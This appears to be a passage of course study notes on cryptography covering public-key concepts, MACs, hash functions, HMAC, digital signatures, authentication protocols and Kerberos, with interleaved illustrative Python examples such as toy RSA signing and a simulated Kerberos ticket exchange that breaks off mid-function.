• Public and Private keys − This is a pair of keys that have been selected so that
if one is used for encryption, the other is used for decryption.
• Ciphertext − This is the scrambled message produced as output. It depends on the
plaintext and the key. For a given message, two different keys will
produce two different ciphertexts.
• Decryption Algorithm − This algorithm accepts the ciphertext and the matching
key and produces the original plaintext.
The keys generated in public key cryptography are large, e.g. 512, 1024, 2048 or more
bits. These keys are not easy to memorize. Thus, they are kept in devices such as USB
tokens or hardware security modules.
The major issue in public key cryptosystems is that an attacker can masquerade as a legitimate
user. The attacker can substitute the public key with a fake key in the public directory. Moreover,
the attacker can intercept the connection or alter those keys.
Public key cryptography plays an essential role in online payment services, e-commerce,
etc. These online services are secure only when the authenticity of the user's public key and
signature is ensured.
An asymmetric cryptosystem should provide the security services of confidentiality,
authentication, integrity and non-repudiation. The public key supports the security
services of non-repudiation and authentication. The security services of confidentiality
and integrity are considered part of the encryption process carried out with the private key of
the user.

Q2: RSA Algorithm (Refer Notes)

Q3: Message Authentication:

Another type of threat that exists for data is the lack of message authentication. Under this threat,
the user is not sure about the originator of the message. Message authentication can be
provided using cryptographic techniques that use secret keys, as is done in the case of
encryption.
Message Authentication Code (MAC)
A MAC algorithm is a symmetric key cryptographic technique to provide message
authentication. To establish the MAC process, the sender and receiver share a symmetric key
K.
Essentially, a MAC is an encrypted checksum generated on the underlying message that is
sent along with the message to ensure message authentication.
The process of using MAC for authentication is depicted in the following illustration −

Let us now try to understand the entire process in detail −


• The sender uses some publicly known MAC algorithm, inputs the message and
the secret key K, and produces a MAC value.
• Like a hash function, a MAC function compresses an arbitrarily long input into a
fixed-length output. The major difference between a hash and a MAC is that the MAC
uses a secret key during the compression.
• The sender forwards the message along with the MAC. Here, we assume that
the message is sent in the clear, as we are concerned with providing message
origin authentication, not confidentiality. If confidentiality is required, the
message needs encryption.
• On receipt of the message and the MAC, the receiver feeds the received
message and the shared secret key K into the MAC algorithm and re-computes
the MAC value.
• The receiver now checks the freshly computed MAC for equality with the MAC
received from the sender. If they match, the receiver accepts the message
and is assured that it was sent by the intended sender.
• If the computed MAC does not match the MAC sent by the sender, the receiver
cannot determine whether the message has been altered or the origin has been
falsified. Either way, the receiver safely assumes that the message is not genuine.
Limitations of MAC
There are two major limitations of a MAC, both due to its symmetric nature of operation −
• Establishment of a Shared Secret
o It can provide message authentication only among pre-decided
legitimate users who hold the shared key.
o This requires establishment of the shared secret prior to use of the MAC.
• Inability to Provide Non-Repudiation
o Non-repudiation is the assurance that a message originator
cannot deny previously sent messages, commitments or actions.
o The MAC technique does not provide a non-repudiation service. If the
sender and receiver get involved in a dispute over message
origination, MACs cannot provide proof that a message was
indeed sent by the sender.
o Though no third party can compute the MAC, the sender could still
deny having sent the message and claim that the receiver forged
it, as it is impossible to determine which of the two parties
computed the MAC.
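The sender/receiver flow and the non-repudiation limitation described above, as an added Python example that is not part of these notes: HMAC-SHA256 stands in for the "publicly known MAC algorithm", and the shared key, the message and the in-transit tampering are constructed for the illustration.

```python
import hashlib
import hmac

# Shared secret K, agreed in advance by sender and receiver (constructed value;
# a real deployment establishes it over a secure channel, never in the clear).
SHARED_KEY = bytes.fromhex("000102030405060708090a0b0c0d0e0f"
                           "101112131415161718191a1b1c1d1e1f")


def generate_mac(key: bytes, message: bytes) -> bytes:
    """Sender side: feed message and secret key K into the MAC algorithm.

    HMAC-SHA256 is the publicly known algorithm; only the key is secret.
    The tag is always 32 bytes, whatever the length of the message.
    """
    return hmac.new(key, message, hashlib.sha256).digest()


def verify_mac(key: bytes, message: bytes, tag: bytes) -> bool:
    """Receiver side: recompute the MAC over the received message and compare.

    compare_digest runs in constant time, so a forger cannot learn from the
    response time how many bytes of a guessed tag were correct.
    """
    expected = hmac.new(key, message, hashlib.sha256).digest()
    return hmac.compare_digest(expected, tag)


def transmit_and_check(message: bytes, tamper: bool = False):
    """Simulate sending (message, MAC) in the clear and the receiver's check.

    Returns (accepted, message_as_received).  With tamper=True a third party
    on the wire edits the payload; the MAC no longer matches and the receiver
    rejects it without knowing whether the text or the origin was falsified.
    """
    tag = generate_mac(SHARED_KEY, message)
    wire_message = message
    if tamper:
        wire_message = message.replace(b"100", b"900")   # amount altered in transit
    accepted = verify_mac(SHARED_KEY, wire_message, tag)
    return accepted, wire_message


def receiver_can_forge(message: bytes) -> bool:
    """The non-repudiation limitation: the receiver also holds K, so a tag it
    computes is byte-for-byte identical to the sender's.  A third party seeing
    (message, tag) cannot tell which of the two parties produced it."""
    sender_tag = generate_mac(SHARED_KEY, message)
    receiver_tag = generate_mac(SHARED_KEY, message)
    return hmac.compare_digest(sender_tag, receiver_tag)


if __name__ == "__main__":
    msg = b"transfer 100 to account 42"
    print(transmit_and_check(msg))               # accepted
    print(transmit_and_check(msg, tamper=True))  # rejected
    print(receiver_can_forge(msg))               # True: no proof of origin
```

The fixed-size tag illustrates the compression property; the tampered run shows why the receiver can only conclude "not genuine", and `receiver_can_forge` is the reason a MAC cannot settle a dispute between the two key holders.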

Q4: Hash Functions:

Hash functions are extremely useful and appear in almost all information security applications.
A hash function is a mathematical function that converts a numerical input value into another,
compressed numerical value. The input to the hash function is of arbitrary length but the output is
always of fixed length.
Values returned by a hash function are called message digests or simply hash values. The
following picture illustrates a hash function −

Features of Hash Functions

The typical features of hash functions are −
• Fixed Length Output (Hash Value)
o A hash function converts data of arbitrary length to a fixed length.
This process is often referred to as hashing the data.
o In general, the hash is much smaller than the input data, hence
hash functions are sometimes called compression functions.
o Since a hash is a smaller representation of larger data, it is also
referred to as a digest.
o A hash function with an n-bit output is referred to as an n-bit hash
function. Popular hash functions generate values between 160
and 512 bits.
• Efficiency of Operation
o Generally, for any hash function h with input x, computation of
h(x) is a fast operation.
o Computationally, hash functions are much faster than
symmetric encryption.
Properties of Hash Functions
In order to be an effective cryptographic tool, a hash function should possess the following
properties −
• Pre-Image Resistance
o This property means that it should be computationally hard to
reverse a hash function.
o In other words, if a hash function h produced a hash value z, then
it should be a difficult process to find any input value x that
hashes to z.
o This property protects against an attacker who only has a hash
value and is trying to find the input.
• Second Pre-Image Resistance
o This property means that, given an input and its hash, it should be
hard to find a different input with the same hash.
o In other words, if a hash function h for an input x produces the hash
value h(x), then it should be difficult to find any other input value
y such that h(y) = h(x).
o This property of the hash function protects against an attacker who
has an input value and its hash and wants to substitute a different
value as the legitimate value in place of the original input.
• Collision Resistance
o This property means it should be hard to find two different inputs
of any length that result in the same hash. A function with this property is also
referred to as a collision-free hash function.
o In other words, for a hash function h, it is hard to find any two
different inputs x and y such that h(x) = h(y).
o Since a hash function is a compressing function with a fixed hash
length, it is impossible for it not to have collisions.
The collision-free property only asserts that these collisions
should be hard to find.
o This property makes it very difficult for an attacker to find two
input values with the same hash.
o Also, if a hash function is collision-resistant then it is second
pre-image resistant.
Design of Hashing Algorithms
At the heart of hashing is a mathematical function that operates on two fixed-size blocks of
data to create a hash code. This hash function forms part of the hashing algorithm.
The size of each data block varies depending on the algorithm. Typically the block sizes are
from 128 bits to 512 bits. The following illustration demonstrates the hash function −
A hashing algorithm involves rounds of the above hash function, like a block cipher. Each round
takes an input of a fixed size, typically a combination of the most recent message block and
the output of the last round.
This process is repeated for as many rounds as are required to hash the entire message.
A schematic of the hashing algorithm is depicted in the following illustration −

The hash value of the first message block becomes an input to the second hash operation,
whose output alters the result of the third operation, and so on, so a change anywhere in the
message propagates through every later round. This effect is known as the avalanche effect
of hashing.
The avalanche effect results in substantially different hash values for two messages that differ by
even a single bit of data.
Understand the difference between the hash function and the hashing algorithm correctly. The hash
function generates a hash code by operating on two blocks of fixed-length binary data.
The hashing algorithm is a process for using the hash function, specifying how the message will
be broken up and how the results from previous message blocks are chained together.
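The three resistance properties and the avalanche effect can be observed directly with a real hash function. The following Python block is an added example, not part of these notes: it measures how many SHA-256 output bits flip for a one-bit input change, and then models an "n-bit hash" by truncating SHA-256 so that the birthday bound for collisions (about 2^(n/2) trials) and the far larger cost of a second pre-image (about 2^n trials) can be seen on small n. The inputs are constructed counters; the function names are the example's own.

```python
import hashlib
import itertools


def sha256_int(data: bytes) -> int:
    """SHA-256 digest as a 256-bit integer."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big")


def avalanche_distance(msg: bytes, bit_index: int = 0) -> int:
    """Flip one bit of msg and count how many of the 256 output bits change.

    For a well-designed hash this is close to 128 (half the output)."""
    flipped = bytearray(msg)
    flipped[bit_index // 8] ^= 1 << (bit_index % 8)
    return bin(sha256_int(msg) ^ sha256_int(bytes(flipped))).count("1")


def truncated_hash(data: bytes, bits: int) -> int:
    """Keep only the top `bits` bits of SHA-256 to model an n-bit hash function.

    Truncation is used purely to make the searches below finish quickly; it
    says nothing about the strength of full-length SHA-256."""
    return sha256_int(data) >> (256 - bits)


def find_collision(bits: int, limit: int = 1 << 20):
    """Birthday search: hash distinct inputs until two share a truncated hash.

    Returns (x, y, attempts) with x != y and h(x) == h(y), or None when the
    attempt limit is reached.  Expected attempts are about 2^(bits/2)."""
    seen = {}
    for i in itertools.count():
        if i >= limit:
            return None
        x = i.to_bytes(4, "big")
        h = truncated_hash(x, bits)
        if h in seen:
            return seen[h], x, i + 1
        seen[h] = x


def find_second_preimage(target: bytes, bits: int, limit: int = 1 << 20):
    """Second pre-image search: given x (target), find y != x with h(y) == h(x).

    No table helps here; each candidate is an independent trial, so the
    expected cost is about 2^bits, the square of the collision cost."""
    wanted = truncated_hash(target, bits)
    for i in range(limit):
        y = b"y" + i.to_bytes(4, "big")
        if y != target and truncated_hash(y, bits) == wanted:
            return y, i + 1
    return None


if __name__ == "__main__":
    print("bits changed by a 1-bit flip:", avalanche_distance(b"The quick brown fox"))
    print("16-bit collision:", find_collision(16))
    print("12-bit second pre-image:", find_second_preimage(b"hello", 12))
```

Running it with `bits=16` finds a collision in a few hundred trials while a 12-bit second pre-image already needs thousands; extrapolating the two exponents to 160 or 256 bits is the practical meaning of "hard to find" in the property list above.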
Popular Hash Functions
Let us briefly see some popular hash functions −
Message Digest (MD)
MD5 was the most popular and widely used hash function for quite some years.
• The MD family comprises the hash functions MD2, MD4, MD5 and MD6. MD5 was
adopted as Internet Standard RFC 1321. It is a 128-bit hash function.
• MD5 digests have been widely used in the software world to provide assurance
about the integrity of a transferred file. For example, file servers often provide a pre-
computed MD5 checksum for the files, so that a user can compare the
checksum of the downloaded file to it.
• In 2004, collisions were found in MD5. An analytical attack was reported to be
successful in only an hour using a computer cluster. This collision attack
compromised MD5 and hence it is no longer recommended for use.
Secure Hash Function (SHA)
The SHA family comprises four SHA algorithms: SHA-0, SHA-1, SHA-2, and SHA-3. Though
from the same family, they are structurally different.
• The original version, SHA-0, a 160-bit hash function, was published by the
National Institute of Standards and Technology (NIST) in 1993. It had a few
weaknesses and did not become very popular. Later, in 1995, SHA-1 was
designed to correct the alleged weaknesses of SHA-0.
• SHA-1 is the most widely used of the existing SHA hash functions. It is
employed in several widely used applications and protocols including Secure
Socket Layer (SSL) security.
• In 2005, a method was found for uncovering collisions for SHA-1 within a practical
time frame, making the long-term employability of SHA-1 doubtful.
• The SHA-2 family has four further SHA variants, SHA-224, SHA-256, SHA-384, and
SHA-512, named for the number of bits in their hash value. No successful
attacks have yet been reported on the SHA-2 hash functions.
• Although SHA-2 is a strong hash function and significantly different from SHA-1, its basic
design still follows the design of SHA-1. Hence, NIST called for new competitive
hash function designs.
• In October 2012, NIST chose the Keccak algorithm as the new SHA-3
standard. Keccak offers many benefits, such as efficient performance and good
resistance to attacks.

Applications of Hash Functions


• Password Storage
• Data Integrity Check
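For the password storage application listed above, the property that matters is that the stored value must not let an attacker recover the password even after the database leaks. The following Python block is an added example, not part of these notes: it contrasts an unsalted fast hash (the anti-pattern) with a per-user salted, iterated PBKDF2-HMAC-SHA256 record and a constant-time verification. The record format, the iteration count and the sample passwords are the example's own choices.

```python
import hashlib
import hmac
import os
from typing import Optional

# PBKDF2-HMAC-SHA256 work factor.  Stored with each record so it can be raised
# later without invalidating existing users.  (Example value.)
ITERATIONS = 600_000


def naive_hash(password: str) -> str:
    """Unsalted, fast hash.  Two users with the same password get the same
    digest, and one precomputed table cracks every record at once.
    Shown only as the anti-pattern."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Return a self-describing record 'pbkdf2_sha256$iterations$salt$hash' (hex).

    The salt is random per user and need not be secret: it forces the attacker
    to attack each record separately and hides which users share a password.
    The iteration count makes each guess expensive."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, hash_hex = record.split("$")
    except ValueError:
        return False                     # malformed record, never accept
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk, bytes.fromhex(hash_hex))


if __name__ == "__main__":
    # Constructed sample: two accounts that happen to share a password.
    print(naive_hash("hunter2") == naive_hash("hunter2"))          # True: identical, linkable
    rec_a, rec_b = hash_password("hunter2"), hash_password("hunter2")
    print(rec_a != rec_b)                                           # True: salts differ
    print(verify_password("hunter2", rec_a), verify_password("hunter3", rec_a))
```

The same `hashlib` call with a fixed, published key and no iterations is what a plain data-integrity check uses; the difference for passwords is entirely in the salt and the deliberate slowness.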

Q5: Hash on MAC Algorithms:

HMAC stands for Hashed or Hash-based Message Authentication Code. It is the
result of work done on developing a MAC derived from cryptographic hash functions. HMAC
is highly resistant to cryptanalytic attacks, as it applies the hash function twice.
HMAC combines the benefits of hashing and a MAC, and is thus more secure than other
authentication codes. HMAC is specified in RFC 2104 and has been made
compulsory to implement in IP security. NIST has also standardized HMAC as
FIPS 198.

Objectives –
Like a hash function, HMAC is also intended to be one way, i.e., easy to generate the output from
the input but hard the other way round.
It aims at being less affected by collisions than the underlying hash functions.
HMAC reuses existing algorithms such as MD5 and SHA-1, and allows the embedded
hash function to be replaced with a more secure one if the need is found.
HMAC tries to handle keys in a simpler manner.

HMAC Algorithm –
The working of HMAC starts with a message M consisting of blocks of length b bits. An
input signature is prepended to the message and the whole is given as input to a
hash function, which gives us a temporary message digest MD'. MD' is in turn appended to an
output signature and the hash function is applied again; the result is our final
message digest MD.
Here is a simple structure of HMAC, where
H stands for the hashing function,
M is the original message,
Si and So are the input and output signatures respectively,
Yi is the ith block of the original message M, where i ranges over [1, L),
L is the count of blocks in M,
K is the secret key used for hashing,
IV is an initial vector (some constant).
The generation of the input signature Si and the output signature So from the key K is shown in
the illustration.
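The construction just described, written out as an added Python example (not part of these notes, and not the HMAC code of any library): Si and So are derived from K with the ipad and opad constants of RFC 2104, the inner hash over Si || M gives MD', and the outer hash over So || MD' gives MD. The hand-built result is cross-checked against Python's `hmac` module; the keys and message are constructed.

```python
import hashlib
import hmac

IPAD = 0x36   # inner pad byte, RFC 2104
OPAD = 0x5C   # outer pad byte, RFC 2104


def hmac_from_scratch(key: bytes, message: bytes, hash_name: str = "sha256") -> bytes:
    """HMAC(K, M) = H(So || H(Si || M)), Si = K+ xor ipad, So = K+ xor opad."""
    # b bits of the underlying hash, as bytes: 64 for MD5, SHA-1 and SHA-256.
    block_size = hashlib.new(hash_name).block_size
    # A key longer than one block is first replaced by H(K); K+ is then the key
    # padded with zero bytes to exactly one block.
    if len(key) > block_size:
        key = hashlib.new(hash_name, key).digest()
    key_plus = key.ljust(block_size, b"\x00")
    s_i = bytes(k ^ IPAD for k in key_plus)        # input signature Si
    s_o = bytes(k ^ OPAD for k in key_plus)        # output signature So
    md_prime = hashlib.new(hash_name, s_i + message).digest()   # temporary digest MD'
    return hashlib.new(hash_name, s_o + md_prime).digest()      # final digest MD


def matches_stdlib(key: bytes, message: bytes, hash_name: str = "sha256") -> bool:
    """Cross-check the hand-built construction against the hmac module."""
    reference = hmac.new(key, message, hash_name).digest()
    return hmac.compare_digest(hmac_from_scratch(key, message, hash_name), reference)


if __name__ == "__main__":
    key = bytes.fromhex("0b" * 20)            # RFC 4231 test case 1 inputs
    print(hmac_from_scratch(key, b"Hi There").hex())
    print(matches_stdlib(b"k" * 200, b"long key gets hashed first"))
```

Because Si and So differ in every byte, the two hash invocations run on unrelated prefixes; that is what lets HMAC tolerate weaknesses in the plain hash (the "applies the hash twice" point above) while only ever calling H.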
Q6: Digi Signatures and Authentication Protocols:

A digital signature is a mathematical technique which validates the authenticity and integrity
of a message, software or digital document. It allows us to verify the author's name, the date and
time of the signature, and to authenticate the message contents. A digital signature offers far
more inherent security and is intended to solve the problem of tampering and impersonation
(intentionally copying another person's characteristics) in digital communications.

Computer-based authentication of business information involves both technology and the
law. It also calls for cooperation between people of different professional backgrounds and
areas of expertise. Digital signatures differ from other electronic signatures not only
in terms of process and result; the difference also makes digital signatures more serviceable for legal
purposes. Some electronic signatures that are legally recognizable as signatures may not be as
secure as digital signatures and may lead to uncertainty and disputes.

Application of Digital Signature

The important reasons to apply a digital signature to communication are:

o Authentication
o Non-repudiation
o Integrity

Authentication

Authentication is a process which verifies the identity of a user who wants to access the
system. In the digital signature, authentication helps to authenticate the sources of messages.

Non-repudiation

Non-repudiation means assurance of something that cannot be denied. It ensures that a
party to a contract or communication cannot later deny the authenticity of their signature
on a document or in a file, or the sending of a message that they originated.

Integrity

Integrity ensures that the message is real and accurate, and safeguards it from unauthorized
modification during transmission.

Algorithms in Digital Signature

A digital signature consists of three algorithms:

1. Key generation algorithm

The key generation algorithm selects a private key uniformly at random from the set of possible
private keys. It outputs the private key and its corresponding public key.

2. Signing algorithm
A signing algorithm produces a signature for the document.

3. Signature verifying algorithm

A signature verifying algorithm either accepts or rejects the document's authenticity.

How digital signatures work

Digital signatures are created and verified by using public key cryptography, also known as
asymmetric cryptography. Using a public key algorithm, such as RSA, one can
generate two keys that are mathematically linked: one is a private key, and the other is a public
key.

The user who is creating the digital signature uses their own private key to encrypt the
signature-related document. The only way to decrypt that document is with the
signer's public key.

This technology requires all the parties to trust that the individual who creates the signature
has been able to keep their private key secret. If someone has access to the signer's private key,
there is a possibility that they could create fraudulent signatures in the name of the private key
holder.

The steps which are followed in creating and verifying a digital signature are:

1. Select a file to be digitally signed.
2. The hash value of the message or file content is calculated. This hash value
is encrypted using the private key of the sender to form the digital signature.
3. Now, the original message or file content along with the digital signature is transmitted.
4. The receiver decrypts the digital signature using the public key of the sender,
recovering the hash value computed by the sender.
5. The receiver now has the message or file content and can compute its hash value.
6. The two hash values are compared. They must be the same for integrity to be assured.
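The three algorithms (key generation, signing, verifying) and the six steps above, as an added Python example that is not part of these notes. It also exercises the five public-key ingredients listed in Q1, since the same key pair encrypts a constructed session key and decrypts it again. Assumptions of the example: textbook RSA with no padding (a real signer applies PKCS#1 v1.5 or PSS padding before the private-key operation); the primes p and q are the Mersenne primes 2^127-1 and 2^107-1, chosen only because their primality is well established and the example stays deterministic, not as a recommended key-generation method; SHA-224 is used so the digest (224 bits) fits under the 234-bit modulus without reduction.

```python
import hashlib
from math import gcd

# Toy primes (see lead-in): real keys use random primes of 1024 bits or more.
P = (1 << 127) - 1
Q = (1 << 107) - 1
E = 65537           # common public exponent


def generate_keys(p: int = P, q: int = Q, e: int = E):
    """Key generation algorithm: returns (public_key, private_key).

    public_key = (n, e) may be published; private_key = (n, d) must stay secret."""
    n = p * q
    phi = (p - 1) * (q - 1)
    assert gcd(e, phi) == 1, "e must be coprime to phi(n)"
    d = pow(e, -1, phi)          # modular inverse of e (Python 3.8+)
    return (n, e), (n, d)


def _digest(message: bytes) -> int:
    """Step 2: hash the content; the integer must be below n (224 bits < 234 bits)."""
    return int.from_bytes(hashlib.sha224(message).digest(), "big")


def sign(private_key, message: bytes) -> int:
    """Signing algorithm: 'encrypt' the hash with the private key."""
    n, d = private_key
    return pow(_digest(message), d, n)


def verify(public_key, message: bytes, signature: int) -> bool:
    """Verification: steps 4 to 6.  Recover the signer's hash with the public
    key, hash the received content independently, and compare."""
    n, e = public_key
    recovered_hash = pow(signature, e, n)
    return recovered_hash == _digest(message)


def encrypt(public_key, plaintext: bytes) -> int:
    """Q1 ingredients: plaintext + public key -> ciphertext (no padding; toy)."""
    n, e = public_key
    m = int.from_bytes(plaintext, "big")
    if m >= n:
        raise ValueError("plaintext too large for the modulus")
    return pow(m, e, n)


def decrypt(private_key, ciphertext: int, length: int) -> bytes:
    """Ciphertext + matching private key -> original plaintext."""
    n, d = private_key
    return pow(ciphertext, d, n).to_bytes(length, "big")


if __name__ == "__main__":
    public, private = generate_keys()
    document = b"Pay 100 units to account 42"              # constructed content
    sig = sign(private, document)                           # steps 1-2
    print(verify(public, document, sig))                    # steps 4-6: True
    print(verify(public, document + b"0", sig))             # altered content: False
    session_key = bytes(range(16))                          # constructed 128-bit key
    print(decrypt(private, encrypt(public, session_key), 16) == session_key)
```

The verifier never needs the private key, which is the property that gives non-repudiation: only the holder of d could have produced a value whose e-th power modulo n equals the hash of the document.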

Types of Digital Signature

Different document processing platforms support different types of digital signature. They are
described below:
Certified Signatures

Documents with a certified digital signature display a unique blue ribbon across the top of the
document. The certified signature contains the name of the document signer and the certificate
issuer, which indicate the authorship and authenticity of the document.

Approval Signatures

Approval digital signatures on a document can be used in the organization's business
workflow. They help to optimize the organization's approval procedure. The procedure
involves capturing approvals made by us and other individuals and embedding them within
the PDF document. Approval signatures can include details such as an image of our
physical signature, location, date and official seal.

Visible Digital Signature

A visible digital signature allows a user to sign a single document digitally. This signature
appears on the document in the same way as a signature on a physical document.

Invisible Digital Signature

Invisible digital signatures carry a visual indication of a blue ribbon within a document in
the taskbar. We can use invisible digital signatures when we do not have or do not want to
display our signature but need to provide the authenticity of the document, its integrity and its
origin.

Q7 authentication protocols:

User authentication is the first priority when responding to a request made by a
user to a software application. There are several mechanisms for authenticating access
before access to the data is granted. Here we look at
the most common authentication protocols and their merits and
demerits.
1. Kerberos :
Kerberos is a protocol that aids in network authentication. It is used for validating
clients and servers on a network using cryptographic keys. It is designed to
perform strong authentication for client/server applications. The reference implementation
of the Kerberos protocol is openly available from MIT and is used in many mass-produced
products.

Some advantages of Kerberos :


• It supports various operating systems.
• The authentication key is shared much more efficiently than with public sharing.
Some disadvantages of Kerberos :
• It is used only to authenticate clients and the services used by them.
• It is vulnerable to soft or weak passwords.
2. Lightweight Directory Access Protocol (LDAP) :
LDAP refers to the Lightweight Directory Access Protocol. It is a protocol used for
locating individuals, organizations and other devices on a network, regardless
of whether it is on the public or a corporate internet. It is offered as Directory-as-a-Service and is
the basis on which Microsoft built Active Directory.
Some advantages of LDAP :
• It is an automated protocol, which makes modernization easier.
• It supports existing technologies and allows multiple directories.
Some disadvantages of LDAP :
• It requires deployment experience.
• The directory servers are required to be LDAP compliant for deployment.
3. OAuth2 :
OAuth, as the name suggests, is an authorization framework that allows granting
limited access to a user's account through an HTTP service. When a user requests
access to resources, an API call is made and, after authentication, the token is passed.
Some advantages of OAuth2 :
• It is a simple protocol and is easy to implement.
• It provides server-side authorization of code.
Some disadvantages of OAuth2 :
• Managing different sets of code is error-prone.
• It has serious effects on sites connected to another affected system.
4. SAML :
SAML stands for Security Assertion Markup Language. It is an XML-based
authentication data format which provides authorization between an identity provider
and a service provider. It is a product of the OASIS Security Services Technical
Committee.
Some advantages of SAML :
• It reduces the administrative costs for the end-users.
• It provides a single sign-on for authenticating across service providers.
Some disadvantages of SAML :
• It is dependent on the identity provider.
• All the data is managed in a single XML format.
5. RADIUS :
RADIUS stands for Remote Authentication Dial-In User Service. It is a network protocol
that provides centralized Authentication, Accounting and Authorization for
users of network services. The protocol operates when a user
requests access to network resources: the RADIUS server encrypts the credentials
entered by the user, checks them against the
local database, and grants access.

Some advantages of RADIUS :

• It is a great mechanism for providing multiple access levels for admins.
• It provides a unique identity to each user in a session.
Some disadvantages of RADIUS :
• Initial implementation of this mechanism is hard on hardware.
• It has a variety of models that may require a special team, which is
costly.

Q8 Authentication Applications:

1. KERBEROS

Kerberos provides a centralized authentication server whose function is to authenticate users
to servers and servers to users. Kerberos relies exclusively on conventional encryption,
making no use of public-key encryption.

The following are the requirements for Kerberos:

Secure: A network eavesdropper should not be able to obtain the necessary information
to impersonate a user. More generally, Kerberos should be strong enough that a potential
opponent does not find it to be the weak link.

Reliable: For all services that rely on Kerberos for access control, lack of availability of
the Kerberos service means lack of availability of the supported services. Hence, Kerberos
should be highly reliable and should employ a distributed server architecture, with one system
able to back up another.

Transparent: Ideally, the user should not be aware that authentication is taking place,
beyond the requirement to enter a password.

Scalable: The system should be capable of supporting large numbers of clients and
servers. This suggests a modular, distributed architecture.

To support these requirements, the overall scheme of Kerberos is that of a trusted third-party
authentication service that uses a protocol based on that proposed by Needham and
Schroeder [NEED78]. It is trusted in the sense that clients and servers trust Kerberos to
mediate their mutual authentication. Assuming the Kerberos protocol is well designed, the
authentication service is secure if the Kerberos server itself is secure.

A Simple Authentication Dialogue

In an unprotected network environment, any client can apply to any server for service.

The obvious security risk is that of impersonation. To counter this threat, servers must be able
to confirm the identities of clients who request service. But in an open environment, this places
a substantial burden on each server.

An alternative is to use an authentication server (AS) that knows the passwords of all
users and stores these in a centralized database. In addition, the AS shares a unique
secret key with each server.

The simple authentication dialogue is as follows:

(1) C >> AS: IDc || Pc || IDv
(2) AS >> C: Ticket
(3) C >> V: IDc || Ticket

Ticket = EKv(IDc || ADc || IDv)

C: Client,
AS: Authentication Server,
V: Server,
IDv: ID of the server,
IDc: ID of the client,
Pc: Password of the client,
ADc: Address of the client,
Kv: secret key shared by AS and V,
||: concatenation.

2. A More Secure Authentication Dialogue

There are two major problems associated with the previous approach:

Plaintext transmission of the password.

Each time a user has to enter the password.

To solve these problems, we introduce a scheme for avoiding plaintext passwords, and a new
server, known as the ticket granting server (TGS). The hypothetical scenario is as follows:

Once per user logon session:
(1) C >> AS: IDc || IDtgs
(2) AS >> C: EKc(Tickettgs)

Once per type of service:
(3) C >> TGS: IDc || IDv || Tickettgs
(4) TGS >> C: Ticketv

Once per service session:
(5) C >> V: IDc || Ticketv

Tickettgs = EKtgs(IDc || ADc || IDtgs || TS1 || Lifetime1)
Ticketv = EKv(IDc || ADc || IDv || TS2 || Lifetime2)

C: Client,
AS: Authentication Server,
V: Server,
IDc: ID of the client,
Pc: Password of the client,
ADc: Address of the client,
IDv: ID of the server,
Kv: secret key shared by AS and V,
||: concatenation,
IDtgs: ID of the TGS server,
Kc: key derived from the client's password, shared by C and AS,
Ktgs: secret key shared by AS and TGS,
TS1, TS2: time stamps,
Lifetime1, Lifetime2: lifetime of the ticket.

The new service, TGS, issues tickets to users who have been authenticated to AS. Thus, the
user first requests a ticket-granting ticket (Tickettgs) from the AS. The client module in the user
workstation saves this ticket. Each time the user requires access to a new service, the client
applies to the TGS, using the ticket to authenticate itself. The TGS then grants a ticket for the
particular service. The client saves each service-granting ticket and uses it to authenticate its
user to a server each time a particular service is requested.
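The five-message dialogue above, run end to end with all three servers and the client, as an added Python example that is not part of these notes or of any Kerberos implementation. Assumptions: a small authenticated-encryption routine built from SHA-256 and HMAC stands in for the DES/AES encryption E_K of the real protocol; tickets are JSON objects; the user database, the password, the client address and the server keys are constructed for the illustration. The example shows why Pc never crosses the wire (the client's Kc is only used locally to open the AS reply) and how V and the TGS reject an expired or mis-addressed ticket.

```python
import hashlib
import hmac
import json
import os
import time

# ---- stand-in for E_K (constructed; the real protocol uses DES/AES) ---------
def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def encrypt(key: bytes, obj: dict) -> bytes:
    """E_K(obj) = nonce || ciphertext || tag.  The tag makes edits detectable."""
    plaintext = json.dumps(obj, sort_keys=True).encode()
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag

def decrypt(key: bytes, blob: bytes) -> dict:
    """Fails with ValueError on a wrong key or a modified ticket."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, nonce + ct, hashlib.sha256).digest(), tag):
        raise ValueError("wrong key or forged ticket")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))))

# ---- keys held by the principals (constructed) --------------------------------
def password_key(password: str) -> bytes:
    return hashlib.sha256(password.encode()).digest()   # Kc, derived from Pc

K_TGS = os.urandom(32)                                  # Ktgs: shared by AS and TGS
K_V = os.urandom(32)                                    # Kv: shared by TGS and V
USERS = {"alice": password_key("correct horse")}        # AS password database
CLIENT_ADDR = "10.0.0.5"                                # ADc as seen by the AS

# ---- the servers ---------------------------------------------------------------
def as_exchange(id_c: str, id_tgs: str, now: int, lifetime: int = 3600) -> bytes:
    """(1),(2): AS returns EKc(Tickettgs); only a client knowing Pc can open it."""
    ticket_tgs = encrypt(K_TGS, {"IDc": id_c, "ADc": CLIENT_ADDR, "IDtgs": id_tgs,
                                 "TS1": now, "Lifetime1": lifetime})
    return encrypt(USERS[id_c], {"Tickettgs": ticket_tgs.hex()})

def tgs_exchange(id_c: str, id_v: str, ticket_tgs: bytes, now: int, lifetime: int = 300) -> bytes:
    """(3),(4): TGS opens Tickettgs with Ktgs, checks it, and issues Ticketv."""
    t = decrypt(K_TGS, ticket_tgs)
    if t["IDc"] != id_c or now > t["TS1"] + t["Lifetime1"]:
        raise PermissionError("ticket-granting ticket invalid or expired")
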